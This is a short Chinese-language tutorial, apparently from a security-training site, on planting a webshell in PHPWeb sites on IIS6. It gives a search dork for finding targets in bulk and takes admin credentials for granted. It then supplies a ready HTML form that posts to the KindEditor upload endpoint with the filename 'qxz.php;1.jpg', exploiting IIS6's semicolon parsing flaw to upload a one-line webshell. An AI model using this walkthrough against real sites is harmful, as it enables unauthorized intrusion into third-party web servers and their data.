天创培训:您身边的信息安全培训专家!
技术中心
phpweb+iis6解析漏洞拿shell过程

为了达到想要的效率,我们可以批量的找phpweb的站点,

关键字:inurl:news/html/?411.html 也可以用一些web漏洞批量检测的,譬如黑吧安全网web漏洞扫描器,本人也在用的,虽然有点老

不过还是有些作用的。文章最后给出下载地址。对了,现在谷歌不能用了,再给出一个访问谷歌的地址 http://91.213.30.153/


后台网址后面直接加 admin.php 。 账号密码怎么拿就不多说了,都懂的。记住拿iis6.0的站点,进入后台不要关闭


复制以下代码保存为.HTML格式
代码:-
--------------------------------------------------------------------------------------------------------------
<form name="uploadForm" method="post" enctype="multipart/form-data" action="http://www.xxx.com/kedit/upload_cgi/upload.php"> 
<input type="text" name="fileName" value="qxz.php;1.jpg" /> 
<input type="hidden" name="attachPath" value="news/pics/" /> 
<input type="file" name="fileData" size="14" /></td> 
<input type="submit" name="button" value="确定" /> 
</form>
-------------------------------------------------------------------------------------
里面的www.xxx.com为你的网址


打开之后会是一个上传的页面,你就把一句话,或者是马上传,记住,后缀一定是这种 qxz.php;1.jpg 格式,然后查看网页源代码,就会有个路径


这就是马的路径,ok就这么简单。